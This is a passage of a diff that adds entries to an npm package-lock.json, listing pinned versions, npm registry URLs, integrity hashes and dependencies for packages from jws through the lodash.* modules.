"sha512-jrZ2Qx916EA+fq9cEAeCROWPTfCwi1IVHqT2tapuqLEVVDKFDENFw1oL+MwrTvH6msKxsd1YTDVw6uKEcsrLEA==", + "dependencies": { + "buffer-equal-constant-time": "1.0.1", + "ecdsa-sig-formatter": "1.0.11", + "safe-buffer": "^5.0.1" + } + }, + "node_modules/jws": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/jws/-/jws-4.0.0.tgz", + "integrity": 
"sha512-KDncfTmOZoOMTFG4mBlG0qUIOlc03fmzH+ru6RgYVZhPkyiy/92Owlt/8UEN+a4TXR1FQetfIpJE8ApdvdVxTg==", + "dependencies": { + "jwa": "^2.0.0", + "safe-buffer": "^5.0.1" + } + }, + "node_modules/kareem": { + "version": "2.6.3", + "resolved": "https://registry.npmjs.org/kareem/-/kareem-2.6.3.tgz", + "integrity": "sha512-C3iHfuGUXK2u8/ipq9LfjFfXFxAZMQJJq7vLS45r3D9Y2xQ/m4S8zaR4zMLFWh9AsNPXmcFfUDhTEO8UIC/V6Q==", + "license": "Apache-2.0", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/keyv": { + "version": "4.5.4", + "resolved": "https://registry.npmjs.org/keyv/-/keyv-4.5.4.tgz", + "integrity": "sha512-oxVHkHR/EJf2CNXnWxRLW6mg7JyCCUcG0DtEGmL2ctUo1PNTin1PUil+r/+4r5MpVgC/fn1kjsx7mjSujKqIpw==", + "dev": true, + "peer": true, + "dependencies": { + "json-buffer": "3.0.1" + } + }, + "node_modules/kind-of": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-6.0.3.tgz", + "integrity": "sha512-dcS1ul+9tmeD95T+x28/ehLgd9mENa3LsvDTtzm3vyBEO7RPptvAD+t44WVXaUjTBRcrpFeFlC8WCruUR456hw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/klaw": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/klaw/-/klaw-3.0.0.tgz", + "integrity": "sha512-0Fo5oir+O9jnXu5EefYbVK+mHMBeEVEy2cmctR1O1NECcCkPRreJKrS6Qt/j3KC2C148Dfo9i3pCmCMsdqGr0g==", + "dependencies": { + "graceful-fs": "^4.1.9" + } + }, + "node_modules/klaw-sync": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/klaw-sync/-/klaw-sync-6.0.0.tgz", + "integrity": "sha512-nIeuVSzdCCs6TDPTqI8w1Yre34sSq7AkZ4B3sfOBbI2CgVSB4Du4aLQijFU2+lhAFCwt9+42Hel6lQNIv6AntQ==", + "dependencies": { + "graceful-fs": "^4.1.11" + } + }, + "node_modules/kleur": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/kleur/-/kleur-4.1.5.tgz", + "integrity": "sha512-o+NO+8WrRiQEE4/7nwRJhN1HWpVmJm511pBHUxPLtp0BUISzlBplORYSmTclCnJvQq2tKu/sgl3xVpkc7ZWuQQ==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/knex": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/knex/-/knex-2.4.0.tgz", + "integrity": "sha512-i0GWwqYp1Hs2yvc2rlDO6nzzkLhwdyOZKRdsMTB8ZxOs2IXQyL5rBjSbS1krowCh6V65T4X9CJaKtuIfkaPGSA==", + "dependencies": { + "colorette": "2.0.19", + "commander": "^9.1.0", + "debug": "4.3.4", + "escalade": "^3.1.1", + "esm": "^3.2.25", + "get-package-type": "^0.1.0", + "getopts": "2.3.0", + "interpret": "^2.2.0", + "lodash": "^4.17.21", + "pg-connection-string": "2.5.0", + "rechoir": "^0.8.0", + "resolve-from": "^5.0.0", + "tarn": "^3.0.2", + "tildify": "2.0.0" + }, + "bin": { + "knex": "bin/cli.js" + }, + "engines": { + "node": ">=12" + }, + "peerDependenciesMeta": { + "better-sqlite3": { + "optional": true + }, + "mysql": { + "optional": true + }, + "mysql2": { + "optional": true + }, + "pg": { + "optional": true + }, + "pg-native": { + "optional": true + }, + "sqlite3": { + "optional": true + }, + "tedious": { + "optional": true + } + } + }, + "node_modules/knex/node_modules/commander": { + "version": "9.5.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-9.5.0.tgz", + "integrity": "sha512-KRs7WVDKg86PWiuAqhDrAQnTXZKraVcCc6vFdL14qrZ/DcWwuRo7VoiYXalXO7S5GKpqYiVEwCbgFDfxNHKJBQ==", + "engines": { + "node": "^12.20.0 || >=14" + } + }, + "node_modules/knex/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + 
"node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/knex/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/known-css-properties": { + "version": "0.30.0", + "resolved": "https://registry.npmjs.org/known-css-properties/-/known-css-properties-0.30.0.tgz", + "integrity": "sha512-VSWXYUnsPu9+WYKkfmJyLKtIvaRJi1kXUqVmBACORXZQxT5oZDsoZ2vQP+bQFDnWtpI/4eq3MLoRMjI2fnLzTQ==", + "dev": true, + "peer": true + }, + "node_modules/language-subtag-registry": { + "version": "0.3.21", + "resolved": "https://registry.npmjs.org/language-subtag-registry/-/language-subtag-registry-0.3.21.tgz", + "integrity": "sha512-L0IqwlIXjilBVVYKFT37X9Ih11Um5NEl9cbJIuU/SwP/zEEAbBPOnEeeuxVMf45ydWQRDQN3Nqc96OgbH1K+Pg==", + "dev": true + }, + "node_modules/language-tags": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/language-tags/-/language-tags-1.0.5.tgz", + "integrity": "sha1-0yHbxNowuovzAk4ED6XBRmH5GTo=", + "dev": true, + "dependencies": { + "language-subtag-registry": "~0.3.2" + } + }, + "node_modules/latexqc": { + "resolved": "services/latexqc", + "link": true + }, + "node_modules/launch-editor": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/launch-editor/-/launch-editor-2.10.0.tgz", + "integrity": "sha512-D7dBRJo/qcGX9xlvt/6wUYzQxjh5G1RvZPgPv8vi4KRU99DVQL/oW7tnVOCCTm2HGeo3C5HvGE5Yrh6UBoZ0vA==", + "dev": true, + "license": "MIT", + "dependencies": { + "picocolors": "^1.0.0", + "shell-quote": "^1.8.1" + } + }, + "node_modules/lazy-ass": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/lazy-ass/-/lazy-ass-1.6.0.tgz", + "integrity": "sha1-eZllXoZGwX8In90YfRUNMyTVRRM=", + "dev": true, + "engines": { + "node": "> 0.8" + } + }, + "node_modules/lazystream": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/lazystream/-/lazystream-1.0.1.tgz", + "integrity": "sha512-b94GiNHQNy6JNTrt5w6zNyffMrNkXZb3KTkCZJb2V1xaEGCk093vkZ2jk3tpaeP33/OiXC+WvK9AxUebnf5nbw==", + "dependencies": { + "readable-stream": "^2.0.5" + }, + "engines": { + "node": ">= 0.6.3" + } + }, + "node_modules/lazystream/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/lazystream/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/lazystream/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/ldap-filter": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/ldap-filter/-/ldap-filter-0.2.2.tgz", + "integrity": "sha1-8rhCvguG2jNSeYUFsx68rlkNd9A=", + "dependencies": { + "assert-plus": "0.1.5" + 
}, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/ldapauth-fork": { + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/ldapauth-fork/-/ldapauth-fork-4.3.3.tgz", + "integrity": "sha512-x76VpQ5ZqkwAJmqwcD6KIwDiNEbgIGIPGwC/eA17e1dxWhlTx36w0DlLOFwjTuZ2iuaLTsZsUprlVqvSlwc/1Q==", + "dependencies": { + "@types/ldapjs": "^1.0.0", + "@types/node": "*", + "bcryptjs": "^2.4.0", + "ldapjs": "^1.0.2", + "lru-cache": "^5.1.1" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/ldapauth-fork/node_modules/asn1": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.3.tgz", + "integrity": "sha1-2sh4dxPJlmhJ/IGAd36+nB3fO4Y=" + }, + "node_modules/ldapauth-fork/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/ldapauth-fork/node_modules/extsprintf": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.2.0.tgz", + "integrity": "sha1-WtlGwi9bMrp/jNdCZxHG6KP8JSk=", + "engines": [ + "node >=0.6.0" + ] + }, + "node_modules/ldapauth-fork/node_modules/ldapjs": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/ldapjs/-/ldapjs-1.0.2.tgz", + "integrity": "sha1-VE/3Ayt7g8aPBwEyjZKXqmlDQPk=", + "dependencies": { + "asn1": "0.2.3", + "assert-plus": "^1.0.0", + "backoff": "^2.5.0", + "bunyan": "^1.8.3", + "dashdash": "^1.14.0", + "ldap-filter": "0.2.2", + "once": "^1.4.0", + "vasync": "^1.6.4", + "verror": "^1.8.1" + }, + "bin": { + "ldapjs-add": "bin/ldapjs-add", + "ldapjs-compare": "bin/ldapjs-compare", + "ldapjs-delete": "bin/ldapjs-delete", + "ldapjs-modify": "bin/ldapjs-modify", + "ldapjs-search": "bin/ldapjs-search" + }, + "engines": { + "node": ">=0.10" + }, + "optionalDependencies": { + "dtrace-provider": "~0.8" + } + }, + "node_modules/ldapauth-fork/node_modules/vasync": { + "version": "1.6.4", + "resolved": "https://registry.npmjs.org/vasync/-/vasync-1.6.4.tgz", + "integrity": "sha1-3+k2Fq0OeugBszKp2Iv8XNyOHR8=", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "verror": "1.6.0" + } + }, + "node_modules/ldapauth-fork/node_modules/vasync/node_modules/verror": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/verror/-/verror-1.6.0.tgz", + "integrity": "sha1-fROyex+swuLakEBetepuW90lLqU=", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "extsprintf": "1.2.0" + } + }, + "node_modules/lead": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/lead/-/lead-4.0.0.tgz", + "integrity": "sha512-DpMa59o5uGUWWjruMp71e6knmwKU3jRBBn1kjuLWN9EeIOxNeSAwvHf03WIl8g/ZMR2oSQC9ej3yeLBwdDc/pg==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/less": { + "version": "3.13.1", + "resolved": "https://registry.npmjs.org/less/-/less-3.13.1.tgz", + "integrity": "sha512-SwA1aQXGUvp+P5XdZslUOhhLnClSLIjWvJhmd+Vgib5BFIr9lMNlQwmwUNOjXThF/A0x+MCYYPeWEfeWiLRnTw==", + "dev": true, + "dependencies": { + "copy-anything": "^2.0.1", + "tslib": "^1.10.0" + }, + "bin": { + "lessc": "bin/lessc" + }, + "engines": { + "node": ">=6" + }, + "optionalDependencies": { + "errno": "^0.1.1", + "graceful-fs": "^4.1.2", + "image-size": "~0.5.0", + "make-dir": "^2.1.0", + "mime": "^1.4.1", + "native-request": "^1.0.5", + "source-map": "~0.6.0" + } + }, + "node_modules/less-loader": { + "version": "11.1.3", + "resolved": "https://registry.npmjs.org/less-loader/-/less-loader-11.1.3.tgz", 
+ "integrity": "sha512-A5b7O8dH9xpxvkosNrP0dFp2i/dISOJa9WwGF3WJflfqIERE2ybxh1BFDj5CovC2+jCE4M354mk90hN6ziXlVw==", + "dev": true, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "less": "^3.5.0 || ^4.0.0", + "webpack": "^5.0.0" + } + }, + "node_modules/less/node_modules/mime": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", + "dev": true, + "optional": true, + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/less/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "node_modules/leven": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", + "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/levn": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", + "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", + "dependencies": { + "prelude-ls": "^1.2.1", + "type-check": "~0.4.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/lilconfig": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/lilconfig/-/lilconfig-2.1.0.tgz", + "integrity": "sha512-utWOt/GHzuUxnLKxB6dk81RoOeoNeHgbrXiuGk4yyF5qlRz+iIVWu56E2fqGHFrXz0QNUhLB/8nKqvRH66JKGQ==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/lines-and-columns": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", + "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "dev": true + }, + "node_modules/linkify-it": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/linkify-it/-/linkify-it-5.0.0.tgz", + "integrity": "sha512-5aHCbzQRADcdP+ATqnDuhhJ/MRIqDkZX5pyjFHRRysS8vZ5AbqGEoFIb6pYHPZ+L/OC2Lc+xT8uHVVR5CAK/wQ==", + "dependencies": { + "uc.micro": "^2.0.0" + } + }, + "node_modules/linkify-it/node_modules/uc.micro": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/uc.micro/-/uc.micro-2.1.0.tgz", + "integrity": "sha512-ARDJmphmdvUk6Glw7y9DQ2bFkKBHwQHLi2lsaH6PPmz/Ka9sFOBsBluozhDltWmnv9u/cF6Rt87znRTPV+yp/A==" + }, + "node_modules/listr2": { + "version": "3.14.0", + "resolved": "https://registry.npmjs.org/listr2/-/listr2-3.14.0.tgz", + "integrity": "sha512-TyWI8G99GX9GjE54cJ+RrNMcIFBfwMPxc3XTFiAYGN4s10hWROGtOg7+O6u6LE3mNkyld7RSLE6nrKBvTfcs3g==", + "dev": true, + "dependencies": { + "cli-truncate": "^2.1.0", + "colorette": "^2.0.16", + "log-update": "^4.0.0", + "p-map": "^4.0.0", + "rfdc": "^1.3.0", + "rxjs": "^7.5.1", + "through": "^2.3.8", + "wrap-ansi": "^7.0.0" + }, + "engines": { + "node": ">=10.0.0" + }, + "peerDependencies": { + "enquirer": ">= 2.3.0 < 3" + }, + "peerDependenciesMeta": { + "enquirer": { + "optional": true + } + } + }, + "node_modules/load-script": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/load-script/-/load-script-1.0.0.tgz", + 
"integrity": "sha1-BJGTngvuVkPuSUp+PaPSuscMbKQ=", + "dev": true + }, + "node_modules/loader-runner": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/loader-runner/-/loader-runner-4.2.0.tgz", + "integrity": "sha512-92+huvxMvYlMzMt0iIOukcwYBFpkYJdpl2xsZ7LrlayO7E8SOv+JJUEK17B/dJIHAOLMfh2dZZ/Y18WgmGtYNw==", + "dev": true, + "engines": { + "node": ">=6.11.5" + } + }, + "node_modules/loader-utils": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.4.tgz", + "integrity": "sha512-xXqpXoINfFhgua9xiqD8fPFHgkoq1mmmpE92WlDbm9rNRd/EbRb+Gqf908T2DMfuHjjJlksiK2RbHVOdD/MqSw==", + "dev": true, + "dependencies": { + "big.js": "^5.2.2", + "emojis-list": "^3.0.0", + "json5": "^2.1.2" + }, + "engines": { + "node": ">=8.9.0" + } + }, + "node_modules/loader-utils/node_modules/big.js": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/big.js/-/big.js-5.2.2.tgz", + "integrity": "sha512-vyL2OymJxmarO8gxMr0mhChsO9QGwhynfuu4+MHTAW6czfq9humCB7rKpUjDd9YUiDPU4mzpyupFSvOClAwbmQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/locate-path": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", + "integrity": "sha512-iPZK6eYjbxRu3uB4/WZ3EsEIMJFMqAoopl3R+zuq0UjcAm/MO6KCweDgPfP3elTztoKP3KtnVHxTn2NHBSDVUw==", + "dependencies": { + "p-locate": "^5.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/lockfile": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/lockfile/-/lockfile-1.0.4.tgz", + "integrity": "sha512-cvbTwETRfsFh4nHsL1eGWapU1XFi5Ot9E85sWAwia7Y7EgB7vfqcZhTKZ+l7hCGxSPoushMv5GKhT5PdLv03WA==", + "dev": true, + "dependencies": { + "signal-exit": "^3.0.2" + } + }, + "node_modules/lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + }, + "node_modules/lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "dev": true + }, + "node_modules/lodash._arraypool": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._arraypool/-/lodash._arraypool-2.4.1.tgz", + "integrity": "sha1-6I7suS4ruEyQZWEv2VigcZzUf5Q=" + }, + "node_modules/lodash._basebind": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._basebind/-/lodash._basebind-2.4.1.tgz", + "integrity": "sha1-6UC5690nwyfgqNqxtVkWxTQelXU=", + "dependencies": { + "lodash._basecreate": "~2.4.1", + "lodash._setbinddata": "~2.4.1", + "lodash._slice": "~2.4.1", + "lodash.isobject": "~2.4.1" + } + }, + "node_modules/lodash._baseclone": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._baseclone/-/lodash._baseclone-2.4.1.tgz", + "integrity": "sha1-MPgj5X4X43NdODvWK2Czh1Q7QYY=", + "dependencies": { + "lodash._getarray": "~2.4.1", + "lodash._releasearray": "~2.4.1", + "lodash._slice": "~2.4.1", + "lodash.assign": "~2.4.1", + "lodash.foreach": "~2.4.1", + "lodash.forown": "~2.4.1", + "lodash.isarray": "~2.4.1", + "lodash.isobject": "~2.4.1" + } + }, + "node_modules/lodash._basecreate": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._basecreate/-/lodash._basecreate-2.4.1.tgz", + "integrity": 
"sha1-+Ob1tXip405UEXm1a47uv0oofgg=", + "dependencies": { + "lodash._isnative": "~2.4.1", + "lodash.isobject": "~2.4.1", + "lodash.noop": "~2.4.1" + } + }, + "node_modules/lodash._basecreatecallback": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._basecreatecallback/-/lodash._basecreatecallback-2.4.1.tgz", + "integrity": "sha1-fQsmdknLKeehOdAQO3wR+uhOSFE=", + "dependencies": { + "lodash._setbinddata": "~2.4.1", + "lodash.bind": "~2.4.1", + "lodash.identity": "~2.4.1", + "lodash.support": "~2.4.1" + } + }, + "node_modules/lodash._basecreatewrapper": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._basecreatewrapper/-/lodash._basecreatewrapper-2.4.1.tgz", + "integrity": "sha1-TTHy595+E0+/KAN2K4FQsyUZZm8=", + "dependencies": { + "lodash._basecreate": "~2.4.1", + "lodash._setbinddata": "~2.4.1", + "lodash._slice": "~2.4.1", + "lodash.isobject": "~2.4.1" + } + }, + "node_modules/lodash._createwrapper": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._createwrapper/-/lodash._createwrapper-2.4.1.tgz", + "integrity": "sha1-UdaVeXPaTtVW43KQ2MGhjFPeFgc=", + "dependencies": { + "lodash._basebind": "~2.4.1", + "lodash._basecreatewrapper": "~2.4.1", + "lodash._slice": "~2.4.1", + "lodash.isfunction": "~2.4.1" + } + }, + "node_modules/lodash._getarray": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._getarray/-/lodash._getarray-2.4.1.tgz", + "integrity": "sha1-+vH3+BD6mFolHCGHQESBCUg55e4=", + "dependencies": { + "lodash._arraypool": "~2.4.1" + } + }, + "node_modules/lodash._isnative": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._isnative/-/lodash._isnative-2.4.1.tgz", + "integrity": "sha1-PqZAS3hKe+g2x7V1gOHN95sUgyw=" + }, + "node_modules/lodash._maxpoolsize": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._maxpoolsize/-/lodash._maxpoolsize-2.4.1.tgz", + "integrity": "sha1-nUgvRjuOZq++WcLBTtsRcGAXIzQ=" + }, + "node_modules/lodash._objecttypes": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._objecttypes/-/lodash._objecttypes-2.4.1.tgz", + "integrity": "sha1-fAt/admKH3ZSn4kLDNsbTf7BHBE=" + }, + "node_modules/lodash._releasearray": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._releasearray/-/lodash._releasearray-2.4.1.tgz", + "integrity": "sha1-phOWMNdtFTawfdyAliiJsIL2pkE=", + "dependencies": { + "lodash._arraypool": "~2.4.1", + "lodash._maxpoolsize": "~2.4.1" + } + }, + "node_modules/lodash._setbinddata": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._setbinddata/-/lodash._setbinddata-2.4.1.tgz", + "integrity": "sha1-98IAzRuS7yNrOZ7s9zxkjReqlNI=", + "dependencies": { + "lodash._isnative": "~2.4.1", + "lodash.noop": "~2.4.1" + } + }, + "node_modules/lodash._shimkeys": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._shimkeys/-/lodash._shimkeys-2.4.1.tgz", + "integrity": "sha1-bpzJZm/wgfC1psl4uD4kLmlJ0gM=", + "dependencies": { + "lodash._objecttypes": "~2.4.1" + } + }, + "node_modules/lodash._slice": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._slice/-/lodash._slice-2.4.1.tgz", + "integrity": "sha1-dFz0GlNZexj2iImFREBe+isG2Q8=" + }, + "node_modules/lodash.assign": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.assign/-/lodash.assign-2.4.1.tgz", + "integrity": "sha1-hMOVlt1xGBqXsGUpE6fJZ15Jsao=", + "dependencies": { + "lodash._basecreatecallback": "~2.4.1", + "lodash._objecttypes": "~2.4.1", + 
"lodash.keys": "~2.4.1" + } + }, + "node_modules/lodash.bind": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.bind/-/lodash.bind-2.4.1.tgz", + "integrity": "sha1-XRn6AFyMTSNvr0dCx7eh/Kvikmc=", + "dependencies": { + "lodash._createwrapper": "~2.4.1", + "lodash._slice": "~2.4.1" + } + }, + "node_modules/lodash.camelcase": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", + "integrity": "sha1-soqmKIorn8ZRA1x3EfZathkDMaY=" + }, + "node_modules/lodash.clonedeep": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-2.4.1.tgz", + "integrity": "sha1-8pIDtAsS/uCkXTYxZIJZvrq8eGg=", + "dependencies": { + "lodash._baseclone": "~2.4.1", + "lodash._basecreatecallback": "~2.4.1" + } + }, + "node_modules/lodash.debounce": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/lodash.debounce/-/lodash.debounce-4.0.8.tgz", + "integrity": "sha512-FT1yDzDYEoYWhnSGnpE/4Kj1fLZkDFyqRb7fNt6FdYOSxlUWAtp42Eh6Wb0rGIv/m9Bgo7x4GhQbm5Ys4SG5ow==", + "dev": true + }, + "node_modules/lodash.defaults": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz", + "integrity": "sha1-0JF4cW/+pN3p5ft7N/bwgCJ0WAw=" + }, + "node_modules/lodash.difference": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/lodash.difference/-/lodash.difference-4.5.0.tgz", + "integrity": "sha1-nMtOUF1Ia5FlE0V3KIWi3yf9AXw=" + }, + "node_modules/lodash.flatten": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/lodash.flatten/-/lodash.flatten-4.4.0.tgz", + "integrity": "sha1-8xwiIlqWMtK7+OSt2+8kCqdlph8=" + }, + "node_modules/lodash.foreach": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.foreach/-/lodash.foreach-2.4.1.tgz", + "integrity": "sha1-/j/Do0yGyUyrb5UiVgKCdB4BYwk=", + "dependencies": { + "lodash._basecreatecallback": "~2.4.1", + "lodash.forown": "~2.4.1" + } + }, + "node_modules/lodash.forown": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.forown/-/lodash.forown-2.4.1.tgz", + "integrity": "sha1-eLQer+FAX6lmRZ6kGT/VAtCEUks=", + "dependencies": { + "lodash._basecreatecallback": "~2.4.1", + "lodash._objecttypes": "~2.4.1", + "lodash.keys": "~2.4.1" + } + }, + "node_modules/lodash.get": { + "version": "4.4.2", + "resolved": "https://registry.npmjs.org/lodash.get/-/lodash.get-4.4.2.tgz", + "integrity": "sha1-LRd/ZS+jHpObRDjVNBSZ36OCXpk=" + }, + "node_modules/lodash.has": { + "version": "4.5.2", + "resolved": "https://registry.npmjs.org/lodash.has/-/lodash.has-4.5.2.tgz", + "integrity": "sha1-0Z9NwQlQWMzL4rDN9O4P5Ko3yGI=", + "dev": true + }, + "node_modules/lodash.identity": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.identity/-/lodash.identity-2.4.1.tgz", + "integrity": "sha1-ZpTP+mX++TH3wxzobHRZfPVg9PE=" + }, + "node_modules/lodash.includes": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz", + "integrity": "sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w==" + }, + "node_modules/lodash.isarguments": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/lodash.isarguments/-/lodash.isarguments-3.1.0.tgz", + "integrity": "sha1-L1c9hcaiQon/AGY7SRwdM4/zRYo=" + }, + "node_modules/lodash.isarray": { + "version": "2.4.1", + "resolved": 